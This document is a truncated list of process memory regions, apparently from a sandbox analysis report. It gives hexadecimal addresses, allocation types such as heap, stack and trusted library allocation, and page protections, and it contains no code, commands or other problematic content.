281AC8B0000
|
direct allocation
|
page read and write
|
||
17D13C51000
|
heap
|
page read and write
|
||
281AC9CA000
|
heap
|
page read and write
|
||
7FFDFB2F2000
|
unkown
|
page execute and read and write
|
||
7FFD9AB08000
|
trusted library allocation
|
page read and write
|
||
16CEEF76000
|
heap
|
page read and write
|
||
23671050000
|
heap
|
page read and write
|
||
281AC11A000
|
heap
|
page read and write
|
||
7FFD9A7D0000
|
trusted library allocation
|
page read and write
|
||
281AC11C000
|
heap
|
page read and write
|
||
7FFE13391000
|
unkown
|
page execute and read and write
|
||
23BCC913000
|
heap
|
page read and write
|
||
281AD1E0000
|
direct allocation
|
page read and write
|
||
281AC03E000
|
heap
|
page read and write
|
||
1D37210F000
|
heap
|
page read and write
|
||
281AC9CC000
|
heap
|
page read and write
|
||
21B78FD7000
|
heap
|
page read and write
|
||
281AC9C4000
|
heap
|
page read and write
|
||
23BCD034000
|
heap
|
page read and write
|
||
1CA952C2000
|
heap
|
page read and write
|
||
281ABF4C000
|
heap
|
page read and write
|
||
2646BB2E000
|
heap
|
page read and write
|
||
2646BC50000
|
heap
|
page read and write
|
||
174F1949000
|
heap
|
page read and write
|
||
227EEDB0000
|
heap
|
page read and write
|
||
281AC940000
|
direct allocation
|
page read and write
|
||
27A16FF000
|
stack
|
page read and write
|
||
177F000
|
stack
|
page read and write
|
||
16CEEF6B000
|
heap
|
page read and write
|
||
1B3F6A71000
|
heap
|
page read and write
|
||
281ABF76000
|
heap
|
page read and write
|
||
281AC9EE000
|
heap
|
page read and write
|
||
1210000
|
heap
|
page read and write
|
||
281A9B40000
|
heap
|
page read and write
|
||
2DDB4EDC000
|
heap
|
page read and write
|
||
23BCD028000
|
heap
|
page read and write
|
||
264FC18A000
|
heap
|
page read and write
|
||
29AF000
|
trusted library allocation
|
page read and write
|
||
281AC960000
|
direct allocation
|
page read and write
|
||
7FFD9A7AD000
|
trusted library allocation
|
page execute and read and write
|
||
1478000
|
heap
|
page read and write
|
||
7FFD9A7B0000
|
trusted library allocation
|
page read and write
|
||
23BCC92B000
|
heap
|
page read and write
|
||
16CEEF23000
|
heap
|
page read and write
|
||
2224AC70000
|
trusted library allocation
|
page read and write
|
||
1FCD6320000
|
heap
|
page read and write
|
||
1FCD67CE000
|
heap
|
page read and write
|
||
2462D1BC000
|
heap
|
page read and write
|
||
19524E89000
|
heap
|
page read and write
|
||
1D37210F000
|
heap
|
page read and write
|
||
70E9BCF000
|
stack
|
page read and write
|
||
1C09AB80000
|
heap
|
page read and write
|
||
281AC9EB000
|
heap
|
page read and write
|
||
281AC9EE000
|
heap
|
page read and write
|
||
119B000
|
heap
|
page read and write
|
||
2224F0A0000
|
remote allocation
|
page read and write
|
||
281ABF21000
|
heap
|
page read and write
|
||
16CEF06B000
|
heap
|
page read and write
|
||
281ABF24000
|
heap
|
page read and write
|
||
281AC08E000
|
heap
|
page read and write
|
||
211E2F70000
|
heap
|
page read and write
|
||
281ABF4C000
|
heap
|
page read and write
|
||
1F226A80000
|
trusted library allocation
|
page read and write
|
||
2224F091000
|
trusted library allocation
|
page read and write
|
||
26469B25000
|
heap
|
page read and write
|
||
281AC11A000
|
heap
|
page read and write
|
||
281AC520000
|
direct allocation
|
page read and write
|
||
24630871000
|
trusted library allocation
|
page read and write
|
||
1F23D3E6000
|
heap
|
page read and write
|
||
281AC11E000
|
heap
|
page read and write
|
||
2224ED30000
|
trusted library allocation
|
page read and write
|
||
174F1941000
|
heap
|
page read and write
|
||
21B78F57000
|
heap
|
page read and write
|
||
E8C8BFE000
|
stack
|
page read and write
|
||
16CEF050000
|
heap
|
page read and write
|
||
281AC9CE000
|
heap
|
page read and write
|
||
281AC05E000
|
heap
|
page read and write
|
||
7FFD9A982000
|
trusted library allocation
|
page read and write
|
||
21B794F4000
|
heap
|
page read and write
|
||
2DDB4EEB000
|
heap
|
page read and write
|
||
26469AA7000
|
heap
|
page read and write
|
||
26469B15000
|
heap
|
page read and write
|
||
26469B27000
|
heap
|
page read and write
|
||
1DFEFC73000
|
heap
|
page read and write
|
||
1F23D3A0000
|
heap
|
page read and write
|
||
281AC424000
|
direct allocation
|
page read and write
|
||
23E908A0000
|
heap
|
page read and write
|
||
7FFD9A7E1000
|
trusted library allocation
|
page read and write
|
||
21B78FD7000
|
heap
|
page read and write
|
||
2462F955000
|
trusted library allocation
|
page read and write
|
||
281AD300000
|
direct allocation
|
page read and write
|
||
1FCD633E000
|
heap
|
page read and write
|
||
CBA000
|
heap
|
page read and write
|
||
1F223103000
|
heap
|
page read and write
|
||
23BCC8F5000
|
heap
|
page read and write
|
||
1DFEFC2B000
|
heap
|
page read and write
|
||
25F37815000
|
heap
|
page read and write
|
||
1B93B000
|
stack
|
page read and write
|
||
2646A2B9000
|
heap
|
page read and write
|
||
1C09922E000
|
heap
|
page read and write
|
||
7FFD9A886000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9AB90000
|
trusted library allocation
|
page read and write
|
||
281ACD43000
|
heap
|
page read and write
|
||
21B794E0000
|
heap
|
page read and write
|
||
1DFF30D0000
|
direct allocation
|
page read and write
|
||
281AD1A0000
|
direct allocation
|
page read and write
|
||
281ADB50000
|
direct allocation
|
page read and write
|
||
7FFDFB032000
|
unkown
|
page execute and read and write
|
||
1F23D19C000
|
heap
|
page read and write
|
||
1FCD619E000
|
heap
|
page read and write
|
||
1340000
|
trusted library allocation
|
page read and write
|
||
A977BED000
|
stack
|
page read and write
|
||
21B78FCA000
|
heap
|
page read and write
|
||
25F37808000
|
heap
|
page read and write
|
||
281AC11E000
|
heap
|
page read and write
|
||
1FCD6191000
|
heap
|
page read and write
|
||
21B78F57000
|
heap
|
page read and write
|
||
7FFDFB050000
|
unkown
|
page readonly
|
||
1F23D3CD000
|
heap
|
page read and write
|
||
1FCD632A000
|
heap
|
page read and write
|
||
1C09AB94000
|
heap
|
page read and write
|
||
7FFDF8551000
|
unkown
|
page execute and read and write
|
||
26469AB7000
|
heap
|
page read and write
|
||
1DFEFC31000
|
heap
|
page read and write
|
||
211E31A0000
|
heap
|
page read and write
|
||
281ABE6E000
|
heap
|
page read and write
|
||
7FFDFB705000
|
unkown
|
page execute and write copy
|
||
281AC111000
|
heap
|
page read and write
|
||
1061000
|
heap
|
page read and write
|
||
281ACD7B000
|
heap
|
page read and write
|
||
1DFF3239000
|
direct allocation
|
page read and write
|
||
1C098AF0000
|
heap
|
page read and write
|
||
281AB6A2000
|
heap
|
page read and write
|
||
1DFEFC4D000
|
heap
|
page read and write
|
||
22249906000
|
heap
|
page read and write
|
||
23BCC8A0000
|
heap
|
page read and write
|
||
2538C920000
|
heap
|
page read and write
|
||
1D37211C000
|
heap
|
page read and write
|
||
12A5E0AB000
|
heap
|
page read and write
|
||
50D2CFF000
|
stack
|
page read and write
|
||
7FFE0EC10000
|
unkown
|
page readonly
|
||
7FFDFAA4C000
|
unkown
|
page execute and read and write
|
||
281AB6B1000
|
heap
|
page read and write
|
||
BE0000
|
heap
|
page read and write
|
||
281ABFBF000
|
heap
|
page read and write
|
||
1C09920E000
|
heap
|
page read and write
|
||
19524804000
|
heap
|
page read and write
|
||
281AB6AF000
|
heap
|
page read and write
|
||
19525FED000
|
heap
|
page read and write
|
||
16CEEED0000
|
heap
|
page read and write
|
||
281ABE6E000
|
heap
|
page read and write
|
||
1B3F6E04000
|
heap
|
page read and write
|
||
2E41000
|
trusted library allocation
|
page read and write
|
||
2646A29F000
|
heap
|
page read and write
|
||
26469CF0000
|
heap
|
page read and write
|
||
281AC414000
|
direct allocation
|
page read and write
|
||
16CEEEAA000
|
heap
|
page read and write
|
||
23BCC929000
|
heap
|
page read and write
|
||
131B3000
|
trusted library allocation
|
page read and write
|
||
19525F4C000
|
heap
|
page read and write
|
||
264FC1ED000
|
heap
|
page read and write
|
||
2DDB4EB6000
|
heap
|
page read and write
|
||
2DDB4EEB000
|
heap
|
page read and write
|
||
1F8B271B000
|
heap
|
page read and write
|
||
281ABF48000
|
heap
|
page read and write
|
||
7FFD9AC20000
|
trusted library allocation
|
page read and write
|
||
1FCD61CC000
|
heap
|
page read and write
|
||
1BC7E000
|
stack
|
page read and write
|
||
E269DFF000
|
unkown
|
page read and write
|
||
1CD4C000
|
stack
|
page read and write
|
||
25B4F181000
|
heap
|
page read and write
|
||
2860000
|
heap
|
page execute and read and write
|
||
174F1A3A000
|
trusted library allocation
|
page read and write
|
||
7FFDFB051000
|
unkown
|
page execute and read and write
|
||
23F8AB60000
|
heap
|
page read and write
|
||
12A5E050000
|
heap
|
page read and write
|
||
26469B34000
|
heap
|
page read and write
|
||
281ABA70000
|
heap
|
page read and write
|
||
26469AA5000
|
heap
|
page read and write
|
||
281AB6CE000
|
heap
|
page read and write
|
||
16CEEF19000
|
heap
|
page read and write
|
||
1B620000
|
heap
|
page read and write
|
||
281AC0AE000
|
heap
|
page read and write
|
||
281AC9A5000
|
heap
|
page read and write
|
||
1B3F69C0000
|
heap
|
page read and write
|
||
1D0CCE2B000
|
heap
|
page read and write
|
||
281AB6D3000
|
heap
|
page read and write
|
||
73760FE000
|
stack
|
page read and write
|
||
13EC000
|
heap
|
page read and write
|
||
D19907E000
|
stack
|
page read and write
|
||
2367112D000
|
heap
|
page read and write
|
||
281ABE50000
|
heap
|
page read and write
|
||
2224A300000
|
trusted library allocation
|
page read and write
|
||
160026E1000
|
heap
|
page read and write
|
||
7FFD9A7A4000
|
trusted library allocation
|
page read and write
|
||
15E847D0000
|
heap
|
page read and write
|
||
2A04CF71000
|
heap
|
page read and write
|
||
7FF71F118000
|
unkown
|
page write copy
|
||
1D37211C000
|
heap
|
page read and write
|
||
B0EAAFC000
|
stack
|
page read and write
|
||
26469B37000
|
heap
|
page read and write
|
||
281ACA01000
|
heap
|
page read and write
|
||
281ABADD000
|
heap
|
page read and write
|
||
82984FF000
|
stack
|
page read and write
|
||
281AC08E000
|
heap
|
page read and write
|
||
1F8B26E0000
|
heap
|
page read and write
|
||
2A75F974000
|
heap
|
page read and write
|
||
23E90670000
|
heap
|
page read and write
|
||
83470FE000
|
unkown
|
page read and write
|
||
1DFEFC2B000
|
heap
|
page read and write
|
||
7FFDFB6F8000
|
unkown
|
page execute and read and write
|
||
23E907B9000
|
heap
|
page read and write
|
||
264FC184000
|
heap
|
page read and write
|
||
2684AE90000
|
heap
|
page read and write
|
||
7FFE13398000
|
unkown
|
page read and write
|
||
281ACA1C000
|
heap
|
page read and write
|
||
1C09921C000
|
heap
|
page read and write
|
||
C2F0DDE000
|
stack
|
page read and write
|
||
1C098C67000
|
heap
|
page read and write
|
||
23BCE99E000
|
heap
|
page read and write
|
||
7FFD9A82C000
|
trusted library allocation
|
page execute and read and write
|
||
281AB922000
|
heap
|
page read and write
|
||
281AB9E9000
|
heap
|
page read and write
|
||
7FFD9AB09000
|
trusted library allocation
|
page read and write
|
||
23699FBE000
|
heap
|
page read and write
|
||
19525FC3000
|
heap
|
page read and write
|
||
23BCC92A000
|
heap
|
page read and write
|
||
1342000
|
heap
|
page read and write
|
||
1D37210F000
|
heap
|
page read and write
|
||
281ACD47000
|
heap
|
page read and write
|
||
E82B87F000
|
stack
|
page read and write
|
||
7FFD9A7B3000
|
trusted library allocation
|
page execute and read and write
|
||
131A8000
|
trusted library allocation
|
page read and write
|
||
16CEEF47000
|
heap
|
page read and write
|
||
7FFDFAED0000
|
unkown
|
page readonly
|
||
1DC5D410000
|
heap
|
page read and write
|
||
2DDB4EE3000
|
heap
|
page read and write
|
||
281AB6A0000
|
heap
|
page read and write
|
||
1C099239000
|
heap
|
page read and write
|
||
17D13A90000
|
heap
|
page read and write
|
||
23671132000
|
heap
|
page read and write
|
||
2A04D2F4000
|
heap
|
page read and write
|
||
281AC3D4000
|
direct allocation
|
page read and write
|
||
1DFF3070000
|
direct allocation
|
page read and write
|
||
281AB60C000
|
heap
|
page read and write
|
||
14CC0914000
|
heap
|
page read and write
|
||
281ABF76000
|
heap
|
page read and write
|
||
B43000
|
trusted library allocation
|
page read and write
|
||
1BFD0471000
|
heap
|
page read and write
|
||
24646FE1000
|
heap
|
page read and write
|
||
281AB644000
|
heap
|
page read and write
|
||
F0B000
|
heap
|
page read and write
|
||
B3A9EFF000
|
stack
|
page read and write
|
||
7FFE148B0000
|
unkown
|
page readonly
|
||
1FCD61D5000
|
heap
|
page read and write
|
||
280FFFF000
|
stack
|
page read and write
|
||
FE7557F000
|
stack
|
page read and write
|
||
23BCC8D2000
|
heap
|
page read and write
|
||
2646A29F000
|
heap
|
page read and write
|
||
19525F9F000
|
heap
|
page read and write
|
||
23BCE980000
|
heap
|
page read and write
|
||
2462D10E000
|
heap
|
page read and write
|
||
281ABF52000
|
heap
|
page read and write
|
||
23BCC915000
|
heap
|
page read and write
|
||
281AC99D000
|
heap
|
page read and write
|
||
BA02BCE000
|
stack
|
page read and write
|
||
1DFF31A0000
|
direct allocation
|
page read and write
|
||
16CEEF44000
|
heap
|
page read and write
|
||
222498B6000
|
heap
|
page read and write
|
||
23BCD028000
|
heap
|
page read and write
|
||
7FFDFF256000
|
unkown
|
page execute and write copy
|
||
1DFEFC1E000
|
heap
|
page read and write
|
||
281AC556000
|
heap
|
page read and write
|
||
2646A135000
|
heap
|
page read and write
|
||
281AC9A0000
|
heap
|
page read and write
|
||
2462D3A0000
|
heap
|
page read and write
|
||
26469B1C000
|
heap
|
page read and write
|
||
2A1301E0000
|
heap
|
page read and write
|
||
1BA7E000
|
stack
|
page read and write
|
||
23BCC8F4000
|
heap
|
page read and write
|
||
25B4F181000
|
heap
|
page read and write
|
||
23E90750000
|
heap
|
page read and write
|
||
23699F51000
|
heap
|
page read and write
|
||
1DC5D151000
|
heap
|
page read and write
|
||
19522CEF000
|
heap
|
page read and write
|
||
281AD330000
|
direct allocation
|
page read and write
|
||
1630000
|
trusted library allocation
|
page read and write
|
||
23BCCB17000
|
heap
|
page read and write
|
||
21B794EC000
|
heap
|
page read and write
|
||
23BCCB1A000
|
heap
|
page read and write
|
||
26469CFA000
|
heap
|
page read and write
|
||
26469AB9000
|
heap
|
page read and write
|
||
281AC9EE000
|
heap
|
page read and write
|
||
16CEEF02000
|
heap
|
page read and write
|
||
1C09922E000
|
heap
|
page read and write
|
||
21B79519000
|
heap
|
page read and write
|
||
227EED90000
|
heap
|
page read and write
|
||
21B78EDE000
|
heap
|
page read and write
|
||
16CF0B0E000
|
heap
|
page read and write
|
||
1DFEFC27000
|
heap
|
page read and write
|
||
281AB6CE000
|
heap
|
page read and write
|
||
23BCCB13000
|
heap
|
page read and write
|
||
1C829C61000
|
heap
|
page read and write
|
||
281ACA2F000
|
heap
|
page read and write
|
||
7FFD9A81C000
|
trusted library allocation
|
page execute and read and write
|
||
215476E0000
|
heap
|
page read and write
|
||
174F1B25000
|
heap
|
page read and write
|
||
29E02E00000
|
heap
|
page read and write
|
||
7FFE13213000
|
unkown
|
page read and write
|
||
281ABD21000
|
heap
|
page read and write
|
||
15CE000
|
stack
|
page read and write
|
||
2646A28F000
|
heap
|
page read and write
|
||
281ABADD000
|
heap
|
page read and write
|
||
16CEEF72000
|
heap
|
page read and write
|
||
C5C9B7F000
|
stack
|
page read and write
|
||
2155A7CB000
|
heap
|
page read and write
|
||
17D13C49000
|
heap
|
page read and write
|
||
19525FED000
|
heap
|
page read and write
|
||
1B9AF000
|
stack
|
page read and write
|
||
2DFB7F000
|
stack
|
page read and write
|
||
1B8AC240000
|
heap
|
page read and write
|
||
26469A8A000
|
heap
|
page read and write
|
||
31A1000
|
trusted library allocation
|
page read and write
|
||
FE1000
|
heap
|
page read and write
|
||
17D13E20000
|
heap
|
page read and write
|
||
26469AA7000
|
heap
|
page read and write
|
||
2684AE60000
|
heap
|
page read and write
|
||
21B7AEE0000
|
heap
|
page read and write
|
||
1CC34E00000
|
heap
|
page read and write
|
||
7375DFF000
|
stack
|
page read and write
|
||
212531FB000
|
heap
|
page read and write
|
||
7FFD9AAB0000
|
trusted library allocation
|
page read and write
|
||
1271000
|
heap
|
page read and write
|
||
7FFDFB442000
|
unkown
|
page execute and read and write
|
||
2646A2A9000
|
heap
|
page read and write
|
||
1DA81BF0000
|
heap
|
page read and write
|
||
1F2250BA000
|
trusted library allocation
|
page read and write
|
||
1D6BCF80000
|
heap
|
page read and write
|
||
7FFD9A7C0000
|
trusted library allocation
|
page read and write
|
||
21B78FA2000
|
heap
|
page read and write
|
||
23BCD00C000
|
heap
|
page read and write
|
||
23BCC93E000
|
heap
|
page read and write
|
||
2DDB4EE2000
|
heap
|
page read and write
|
||
1DFEFD63000
|
direct allocation
|
page read and write
|
||
281AC101000
|
heap
|
page read and write
|
||
23BCE9A4000
|
heap
|
page read and write
|
||
FDB000
|
heap
|
page read and write
|
||
16CEEF33000
|
heap
|
page read and write
|
||
1D6BD010000
|
heap
|
page read and write
|
||
17D13C51000
|
heap
|
page read and write
|
||
281AC083000
|
heap
|
page read and write
|
||
281AC037000
|
heap
|
page read and write
|
||
281AC450000
|
direct allocation
|
page read and write
|
||
16CEEEEA000
|
heap
|
page read and write
|
||
211E2F91000
|
heap
|
page read and write
|
||
281AB963000
|
heap
|
page read and write
|
||
19524FBB000
|
heap
|
page read and write
|
||
281A9CC0000
|
heap
|
page read and write
|
||
281ACA05000
|
heap
|
page read and write
|
||
281ABF64000
|
heap
|
page read and write
|
||
281ABFBF000
|
heap
|
page read and write
|
||
F70000
|
trusted library allocation
|
page read and write
|
||
1FCD8174000
|
heap
|
page read and write
|
||
7FFD9A942000
|
trusted library allocation
|
page read and write
|
||
23BCD000000
|
heap
|
page read and write
|
||
7FFD9A960000
|
trusted library allocation
|
page execute and read and write
|
||
281AC0A4000
|
heap
|
page read and write
|
||
281ABF64000
|
heap
|
page read and write
|
||
23BCC915000
|
heap
|
page read and write
|
||
281ACD47000
|
heap
|
page read and write
|
||
281AC8C0000
|
direct allocation
|
page read and write
|
||
7FFD9A962000
|
trusted library allocation
|
page read and write
|
||
FDF000
|
stack
|
page read and write
|
||
2646A2A9000
|
heap
|
page read and write
|
||
281ABF39000
|
heap
|
page read and write
|
||
281AC9DC000
|
heap
|
page read and write
|
||
1D37210F000
|
heap
|
page read and write
|
||
2224EF0C000
|
heap
|
page read and write
|
||
281AC9CA000
|
heap
|
page read and write
|
||
1BFD0471000
|
heap
|
page read and write
|
||
7FFD9A7DD000
|
trusted library allocation
|
page execute and read and write
|
||
1D0CCDF0000
|
heap
|
page read and write
|
||
2538CA39000
|
heap
|
page read and write
|
||
7FFD9AAE0000
|
trusted library allocation
|
page read and write
|
||
3061000
|
trusted library allocation
|
page read and write
|
||
281ACBEB000
|
heap
|
page read and write
|
||
281ACB69000
|
heap
|
page read and write
|
||
281A9BD0000
|
heap
|
page read and write
|
||
7FFD9A9F0000
|
trusted library allocation
|
page read and write
|
||
1BF30000
|
heap
|
page read and write
|
||
1F226B4A000
|
trusted library allocation
|
page read and write
|
||
1BA7E000
|
stack
|
page read and write
|
||
129F000
|
stack
|
page read and write
|
||
23BCD010000
|
heap
|
page read and write
|
||
7FFE130C1000
|
unkown
|
page execute and read and write
|
||
1C099239000
|
heap
|
page read and write
|
||
264FC0F0000
|
heap
|
page read and write
|
||
766507F000
|
stack
|
page read and write
|
||
2DDB4EEB000
|
heap
|
page read and write
|
||
EC0000
|
trusted library allocation
|
page read and write
|
||
1BE9E000
|
stack
|
page read and write
|
||
281AD5A0000
|
direct allocation
|
page read and write
|
||
1C09920A000
|
heap
|
page read and write
|
||
281AB67B000
|
heap
|
page read and write
|
||
7FFD9A9E0000
|
trusted library allocation
|
page read and write
|
||
281AB6BF000
|
heap
|
page read and write
|
||
174F0EF9000
|
trusted library allocation
|
page read and write
|
||
174F1B3C000
|
heap
|
page read and write
|
||
23E907C1000
|
heap
|
page read and write
|
||
2463ED85000
|
trusted library allocation
|
page read and write
|
||
7FFD9AB30000
|
trusted library allocation
|
page read and write
|
||
281AC090000
|
heap
|
page read and write
|
||
12E43000
|
trusted library allocation
|
page read and write
|
||
2A04D2F5000
|
heap
|
page read and write
|
||
281ABF23000
|
heap
|
page read and write
|
||
281ABAFB000
|
heap
|
page read and write
|
||
281ABF3C000
|
heap
|
page read and write
|
||
7FFE11EE4000
|
unkown
|
page read and write
|
||
1FCD61D4000
|
heap
|
page read and write
|
||
1C64E000
|
stack
|
page read and write
|
||
70EA237000
|
stack
|
page read and write
|
||
281AC033000
|
heap
|
page read and write
|
||
281ABFBF000
|
heap
|
page read and write
|
||
174F1B25000
|
heap
|
page read and write
|
||
3812FAC000
|
stack
|
page read and write
|
||
F38000
|
heap
|
page read and write
|
||
1C098C6D000
|
heap
|
page read and write
|
||
1DC5D300000
|
heap
|
page read and write
|
||
1C099239000
|
heap
|
page read and write
|
||
281AC033000
|
heap
|
page read and write
|
||
1F23D184000
|
heap
|
page read and write
|
||
281ACDBE000
|
heap
|
page read and write
|
||
12A5E020000
|
heap
|
page read and write
|
||
23699F32000
|
heap
|
page read and write
|
||
281ACFC8000
|
heap
|
page read and write
|
||
31A0000
|
heap
|
page execute and read and write
|
||
7FF6448B4000
|
unkown
|
page readonly
|
||
1FCD67F9000
|
heap
|
page read and write
|
||
2646A2B3000
|
heap
|
page read and write
|
||
281AC117000
|
heap
|
page read and write
|
||
281AC995000
|
heap
|
page read and write
|
||
1F23D163000
|
heap
|
page read and write
|
||
23E907A0000
|
heap
|
page read and write
|
||
7FFD9A860000
|
trusted library allocation
|
page read and write
|
||
281ABF64000
|
heap
|
page read and write
|
||
281ABEC3000
|
heap
|
page read and write
|
||
7FFD9AAF2000
|
trusted library allocation
|
page read and write
|
||
281AC99E000
|
heap
|
page read and write
|
||
1FCD632E000
|
heap
|
page read and write
|
||
174F0EF5000
|
trusted library allocation
|
page read and write
|
||
281AB69B000
|
heap
|
page read and write
|
||
1FCD67E9000
|
heap
|
page read and write
|
||
1DFEFC2F000
|
heap
|
page read and write
|
||
EC5F9FF000
|
stack
|
page read and write
|
||
1DFEFC0D000
|
heap
|
page read and write
|
||
1DFF3050000
|
direct allocation
|
page read and write
|
||
1BFD0468000
|
heap
|
page read and write
|
||
281AB966000
|
heap
|
page read and write
|
||
281AB9C6000
|
heap
|
page read and write
|
||
7FF71F091000
|
unkown
|
page execute read
|
||
E00000
|
heap
|
page read and write
|
||
1F2233B4000
|
heap
|
page read and write
|
||
7FFDFAD10000
|
unkown
|
page execute and read and write
|
||
23671020000
|
heap
|
page read and write
|
||
2A75F5E1000
|
heap
|
page read and write
|
||
281ACD3F000
|
heap
|
page read and write
|
||
16CEF054000
|
heap
|
page read and write
|
||
1DFEFD60000
|
direct allocation
|
page read and write
|
||
281ABE68000
|
heap
|
page read and write
|
||
281AC960000
|
direct allocation
|
page read and write
|
||
1DFEFBF7000
|
heap
|
page read and write
|
||
281AC9DC000
|
heap
|
page read and write
|
||
BA02EFF000
|
stack
|
page read and write
|
||
23BCD039000
|
heap
|
page read and write
|
||
281A9BB0000
|
direct allocation
|
page read and write
|
||
281AB633000
|
heap
|
page read and write
|
||
16002890000
|
heap
|
page read and write
|
||
2462D108000
|
heap
|
page read and write
|
||
1FCD61CA000
|
heap
|
page read and write
|
||
22249800000
|
heap
|
page read and write
|
||
281ACB68000
|
heap
|
page read and write
|
||
1C099223000
|
heap
|
page read and write
|
||
227EEFB4000
|
heap
|
page read and write
|
||
281ACBEB000
|
heap
|
page read and write
|
||
1DFF31F0000
|
direct allocation
|
page read and write
|
||
281AC52C000
|
direct allocation
|
page read and write
|
||
281AB6CE000
|
heap
|
page read and write
|
||
281AC039000
|
heap
|
page read and write
|
||
1CC34E04000
|
heap
|
page read and write
|
||
174F1924000
|
heap
|
page read and write
|
||
1D37210F000
|
heap
|
page read and write
|
||
281AC9E1000
|
heap
|
page read and write
|
||
26469AEF000
|
heap
|
page read and write
|
||
2262D9E5000
|
heap
|
page read and write
|
||
DC0000
|
heap
|
page read and write
|
||
174F19B3000
|
heap
|
page read and write
|
||
2367113E000
|
heap
|
page read and write
|
||
281ABF5C000
|
heap
|
page read and write
|
||
1BDFF000
|
stack
|
page read and write
|
||
1D0CCE41000
|
heap
|
page read and write
|
||
2646A2AC000
|
heap
|
page read and write
|
||
2224F04D000
|
trusted library allocation
|
page read and write
|
||
7FFD9A860000
|
trusted library allocation
|
page read and write
|
||
174F199C000
|
heap
|
page read and write
|
||
281AB921000
|
heap
|
page read and write
|
||
2224ED10000
|
trusted library allocation
|
page read and write
|
||
125C1000
|
trusted library allocation
|
page read and write
|
||
281AC991000
|
heap
|
page read and write
|
||
26469B35000
|
heap
|
page read and write
|
||
281AB67D000
|
heap
|
page read and write
|
||
16CEEED0000
|
heap
|
page read and write
|
||
281ABF64000
|
heap
|
page read and write
|
||
16CEEF6E000
|
heap
|
page read and write
|
||
7FF644870000
|
unkown
|
page readonly
|
||
195247C6000
|
heap
|
page read and write
|
||
2A75F5CB000
|
heap
|
page read and write
|
||
53C92FF000
|
unkown
|
page read and write
|
||
ED5000
|
heap
|
page read and write
|
||
7FFD9AA20000
|
trusted library allocation
|
page read and write
|
||
281AD202000
|
heap
|
page read and write
|
||
21B78FA2000
|
heap
|
page read and write
|
||
2A1305E0000
|
heap
|
page read and write
|
||
25F377F0000
|
heap
|
page read and write
|
||
281AC9E1000
|
heap
|
page read and write
|
||
1B8AC1F0000
|
heap
|
page read and write
|
||
E1D55DB000
|
stack
|
page read and write
|
||
1E835A1B000
|
heap
|
page read and write
|
||
12FE3000
|
trusted library allocation
|
page read and write
|
||
1675000
|
heap
|
page read and write
|
||
9AB18FC000
|
stack
|
page read and write
|
||
12A5E390000
|
heap
|
page read and write
|
||
21B7950C000
|
heap
|
page read and write
|
||
11D0000
|
heap
|
page read and write
|
||
ED0000
|
heap
|
page read and write
|
||
139E000
|
stack
|
page read and write
|
||
12A5E0CC000
|
heap
|
page read and write
|
||
133D000
|
heap
|
page read and write
|
||
23699F83000
|
heap
|
page read and write
|
||
7FF6448AE000
|
unkown
|
page write copy
|
||
281AC9C6000
|
heap
|
page read and write
|
||
2224EE5B000
|
heap
|
page read and write
|
||
F12000
|
heap
|
page read and write
|
||
7FFE14649000
|
unkown
|
page read and write
|
||
FBB000
|
heap
|
page read and write
|
||
1E835A31000
|
heap
|
page read and write
|
||
1F22310F000
|
heap
|
page read and write
|
||
7FFE130CA000
|
unkown
|
page execute and write copy
|
||
127B000
|
heap
|
page read and write
|
||
1F224E10000
|
trusted library allocation
|
page read and write
|
||
12BD1000
|
trusted library allocation
|
page read and write
|
||
227EEE10000
|
heap
|
page read and write
|
||
281AB656000
|
heap
|
page read and write
|
||
174F197B000
|
heap
|
page read and write
|
||
16CEF076000
|
heap
|
page read and write
|
||
F9A5FFF000
|
unkown
|
page read and write
|
||
23F8AC60000
|
heap
|
page read and write
|
||
23671132000
|
heap
|
page read and write
|
||
1BBEE000
|
stack
|
page read and write
|
||
281AB656000
|
heap
|
page read and write
|
||
281ACBED000
|
heap
|
page read and write
|
||
FDD000
|
heap
|
page read and write
|
||
7FFD9A7CB000
|
trusted library allocation
|
page read and write
|
||
281ACA64000
|
heap
|
page read and write
|
||
1FCD6130000
|
heap
|
page read and write
|
||
281AB4D0000
|
heap
|
page read and write
|
||
281ABF4F000
|
heap
|
page read and write
|
||
2462F7F8000
|
trusted library allocation
|
page read and write
|
||
212531F0000
|
heap
|
page read and write
|
||
23BCE9A4000
|
heap
|
page read and write
|
||
281ABF5C000
|
heap
|
page read and write
|
||
281ABE5D000
|
heap
|
page read and write
|
||
21547701000
|
heap
|
page read and write
|
||
281AB6C2000
|
heap
|
page read and write
|
||
23BCE9A6000
|
heap
|
page read and write
|
||
1DFEFD80000
|
direct allocation
|
page read and write
|
||
11F0000
|
heap
|
page read and write
|
||
281AB698000
|
heap
|
page read and write
|
||
1DFEFC0A000
|
heap
|
page read and write
|
||
7FF71F090000
|
unkown
|
page readonly
|
||
281AC980000
|
direct allocation
|
page read and write
|
||
1DC5D130000
|
heap
|
page read and write
|
||
16CEEF16000
|
heap
|
page read and write
|
||
25F379F7000
|
heap
|
page read and write
|
||
227EEE10000
|
heap
|
page read and write
|
||
17D13C3A000
|
heap
|
page read and write
|
||
2224EE2E000
|
heap
|
page read and write
|
||
23BCD029000
|
heap
|
page read and write
|
||
281ABFBF000
|
heap
|
page read and write
|
||
2A75F5E1000
|
heap
|
page read and write
|
||
1CC34E05000
|
heap
|
page read and write
|
||
16002905000
|
heap
|
page read and write
|
||
24647020000
|
heap
|
page read and write
|
||
16CEEEFC000
|
heap
|
page read and write
|
||
23BCC913000
|
heap
|
page read and write
|
||
281AB6B9000
|
heap
|
page read and write
|
||
1C510000
|
heap
|
page read and write
|
||
23F8ADB0000
|
heap
|
page read and write
|
||
16CEEF3C000
|
heap
|
page read and write
|
||
1FCD6178000
|
heap
|
page read and write
|
||
7FFE13380000
|
unkown
|
page readonly
|
||
2155A790000
|
heap
|
page read and write
|
||
281ABF52000
|
heap
|
page read and write
|
||
281ABF64000
|
heap
|
page read and write
|
||
31BC000
|
trusted library allocation
|
page read and write
|
||
1D37210F000
|
heap
|
page read and write
|
||
7FFD9A7C0000
|
trusted library allocation
|
page read and write
|
||
281AB619000
|
heap
|
page read and write
|
||
7FFDFB301000
|
unkown
|
page execute and read and write
|
||
1DFEFC04000
|
heap
|
page read and write
|
||
281AC037000
|
heap
|
page read and write
|
||
1C098BDE000
|
heap
|
page read and write
|
||
14CC05B0000
|
heap
|
page read and write
|
||
281ABFBF000
|
heap
|
page read and write
|
||
2463ED9E000
|
trusted library allocation
|
page read and write
|
||
7FFDFF214000
|
unkown
|
page execute and read and write
|
||
160026D9000
|
heap
|
page read and write
|
||
636B0FF000
|
unkown
|
page read and write
|
||
7664DEF000
|
stack
|
page read and write
|
||
281ABF76000
|
heap
